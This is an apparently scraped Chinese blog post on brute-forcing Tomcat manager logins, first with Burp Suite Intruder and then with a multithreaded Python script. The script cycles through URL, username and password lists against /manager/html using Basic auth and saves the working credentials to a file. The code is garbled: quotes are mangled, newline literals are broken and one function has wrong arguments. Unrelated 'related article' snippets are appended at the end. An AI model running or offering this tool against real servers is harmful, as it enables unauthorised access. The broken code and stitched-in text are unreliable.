2. 程式人生 > >WEB中間件--tomcat爆破,burp和python腳本

WEB中間件--tomcat爆破,burp和python腳本

阿新 發佈:2018-04-26
密碼 span split timeout AS encode base com 分享

1.tomcat 用burpsuit進行弱口令爆破

先抓包
技術分享圖片
技術分享圖片
發送到inturder
技術分享圖片
payload type 選擇custom iterater
第一個payload選用戶名文件,第二個payload用 : 第三個選密碼文件
技術分享圖片
設置base64加密,和去掉URL編碼
技術分享圖片
開始攻擊,得到用戶名密碼
技術分享圖片

2.用python腳本進行爆破

目前正在學習python,

#!/usr/bin/env python
# -*- coding: utf-8 -*-
#by.really
import sys
import requests
import threading
import Queue
import time
import
 
 base64
import os
#headers = {‘Content-Type‘: ‘application/x-www-form-urlencoded‘,‘User-Agent‘: ‘Googlebot/2.1 (+http://www.googlebot.com/bot.html)‘}
u=Queue.Queue()
p=Queue.Queue()
n=Queue.Queue()
#def urllist()
urls=open(‘url.txt‘,‘r‘)
def urllist():
    for url in urls:
        url=url.rstrip()
        u.put(url)
def
 
 namelist():
    names=open(‘name.txt‘,‘r‘)
    for name in names:
        name=name.rstrip()
        n.put(name)

def passlist():
    passwds=open(‘pass.txt‘,‘r‘)
    for passwd in passwds:
        passwd=passwd.rstrip()
        p.put(passwd)

def weakpass(url):
    namelist()
    while not n.empty():
        name =
 
n.get()
        #print name
        passlist()
        while not p.empty():
            good()
            #name = n.get()
            passwd = p.get()
            #print passwd
            headers = {‘Authorization‘: ‘Basic %s==‘ % (base64.b64encode(name+‘:‘+passwd))}
            try:
                r =requests.get(url,headers=headers,timeout=3)
                #print r.status_code
                if r.status_code==200:
                    print ‘[turn] ‘ +url+‘ ‘+name+‘:‘+passwd
                    f = open(‘good.txt‘,‘a+‘)
                    f.write(url+‘ ‘+name+‘:‘+passwd+\n)
                    f.close()
                else:
                    print ‘[false] ‘ + url+‘ ‘+name+‘:‘+passwd
            except:
                print ‘[false] ‘  + url+‘ ‘+name+‘:‘+passwd

def list():
    while u.empty():
        url = u.get()
        weakpass(name,url)

def thread():
    urllist()
    tsk=[]
    for i in open(‘url.txt‘).read().split(\n):
        i = i + ‘/manager/html‘
        t = threading.Thread(target=weakpass,args=(i,))
        tsk.append(t)
    for t in tsk:
        t.start()
        t.join(1)
        #print "current has %d threads" % (threading.activeCount() - 1)
def good():
    good_ = 0
    for i in open(‘good.txt‘).read().split(\n):
        good_+=1
    os.system(‘title "weakpass------good:%s"‘ % (good_))

if __name__=="__main__":
   # alllist()
    thread()

技術分享圖片

WEB中間件--tomcat爆破,burp和python腳本

相關推薦

WEB中間--tomcat爆破,burppython

密碼 span split timeout AS encode base com 分享 1.tomcat 用burpsuit進行弱口令爆破 先抓包 發送到inturder payload type 選擇custom iterater 第一個payload選用戶名文件,

【轉載】關於Python開頭兩行的:#!/usr/bin/python# -*- coding: utf-8 -*-的作用 – 指定文編碼類型

ron 標識 精確 log 解析器 開始 html weight .org 下面的內容來自:http://www.cnblogs.com/blueskylcc/p/5332642.html, 對方也是轉的,不過沒有找到轉載的出處; 1、#!/usr/bin/python

金笛web中間日誌記錄如何清空

金笛問題及解決辦法web中間件日誌記錄過大會造成卡頓現象,所以需要手動清理下日誌記錄,只需一步即可完成。清除路徑:找到數據庫表smssever_out,刪除即可,如圖清理完之後,重啟web中間件,很明顯的感覺順暢了很多!金笛web中間件日誌記錄如何清空

金笛短信貓+web中間——如何發工資條

http images 發送短信 原來 溝通 分享 excel 現在 方式 很多企業發工資還采用打印裁剪紙質工資條的方式,這種方式比較費時費事,如果企業人比較多,工作量比較大。金笛提供短信設備+軟件方式,通過短信方式把工資單下發到員工手機上,既安全又省時間,成為越來越多的公

在linux服務器下日誌提取的python(實現輸入開始時間結束時間打包該時間段內的文

number init temp mktime tar -zcvf .py uri 指令 cal 1.需求:近期在提取linux服務器下的日誌文件時總是需要人工去找某個時間段內的日誌文件,很是枯燥乏味,於是乎,我就想著用python結合linux指令來寫一個日誌提取的腳本,

python 讀取配置文cfg 不讀#號空行

tar.gz code ucs int ppa date 空行 代碼 != 對配置upxxx.cfg 文件,內容如下的讀取 #使用教程:zaper不能為零 #同時#後面代表要更新的包 zkper=0# ucs=1#mips_ucs-1.8.1-bin.tar.gz 讀取

安全預警 | 知名 Web 應用伺服器 Tomcat 資訊洩漏遠端程式碼執行漏洞

原文地址:https://mp.weixin.qq.com/s/RrD8e3mpl9oRgEaf1JKKdQ?client=tim&ptlang=2052&ADUIN=1835083655&ADSESSION=1505840723&ADTA

使用python代碼本地測試環境部署啟動 V0.1

svn python #!/usr/bin/evn python#encoding=utf-8#author:[email protected]/* */import sysimport osimport shutilimport commandsimport timeimport sub

python簡單檢測ip合法性並添加到白名單文

自動較檢並添加ip地址 一鍵添加ip到文件一、功能說明 有時候項目需要通過ip地址來判定是否允許訪問,通常通過一個白名單地址文件來存放這些允許放行的ip,但每次打開文件編輯比較麻煩,容易出錯,也不知道是否添加過,故用python寫了一個自動添加白名單的腳本。二、腳本內容#!/usr/bin/en

.bat 文調用python

桌面 users user 目錄 log start art 一個 python腳本 1.將clearlog.py 腳本放在指定目錄 比如 我放在 C:\Users\Administrator\Desktop 上 也就是桌面上 2.創建一個.bat 位後綴名的腳本 3.寫

Python之利用django---mysql將磁盤文系統寫入數據庫保存

filesystem/usr/lib/python2.6/site-packages/django/contrib/admin/templates/admin/base_site.html#修改登錄名稱############################################[[email

Discuz!X 3.4 任意文刪除漏洞復現過程(附python)

文件刪除 def aaa dal -1 headers bug send auth   今天看下群裏在討論Discuz!X 3.4 任意文件刪除漏洞,自己做了一些測試,記錄一下過程。結尾附上自己編寫的python腳本,自動化實現任意文件刪除。 具體漏洞,請查看 https:

shell 獲得調用的python的print值錯誤log

div spa 錯誤 span class clas int out test 1. shell 獲得調用的python腳本的print值 python test.py > out.log 2.shell 獲得調用的python腳本的錯誤log python t

Python的編寫過程(例子--備份文

pytho lis 十進制 data- 字符串連接 繼續 roo 物理 開始 軟件開發的過程 現在,我們已經走過了編寫一個軟件的各個環節。這些環節可以概括如下: 什麽(分析) 如何(設計) 編寫(實施) 測試(測試與調試) 使用(實施或開發) 維護(優化) 重要我們創建

python采集服務器數據通過API提交到django web服務器,然後展示在頁面上

python學習采集服務器的信息的python程序#coding:utf-8import psutilimport urllibimport urllib.requestimport urllib.parse#import urllib2import requests#獲取數據cpuData = psutil

通過python獲取服務器硬信息

nbsp 通過 pen port ctu Coding meminfo platform [] #!/usr/bin/python # coding:utf-8 """ 采集機器自身信息 1 主機名 2 內存 3 ip與mac地址 4 cpu信息 5

兩個關於數列的Python(斐波那契數列猴子吃香蕉類問題)

斐波那契數列 公式 shadow 數學家 因數 app text img mage 斐波那契數列(Fibonacci sequence),因數學家列昂納多·斐波那契(Leonardoda Fibonacci)以兔子繁殖為例子而引入,故又稱為“兔子數列”,又因其相鄰兩項的比無

python 實現備份文

python 腳本實現備份文件''' 功能:備份文件 版本:1.0 作者:白 ''' import os,time,sys d_dir = '/data/backup/' d_file = 'system_bak.tar.gz'

python 實現查看文內容

python 腳本實現查看文件內容''' 功能:查看文件 版本:1.0 作者:白 ''' import sys,os try: filename=sys.argv[1] try: f=open(filename) exce

一個非常簡單易懂的WIFI密碼爆破python

2.7.6 OS readline 錯誤 而且 學習 入庫 邏輯錯誤 api 摘要: 我得說明下這個東西一點都不高端,甚至看起來有點糟糕。而且用的是單線程~,因為過幾天要搬家了,於是。。 環境準備 python2.7 湊合的linux 差不多的無線網卡 pywifi模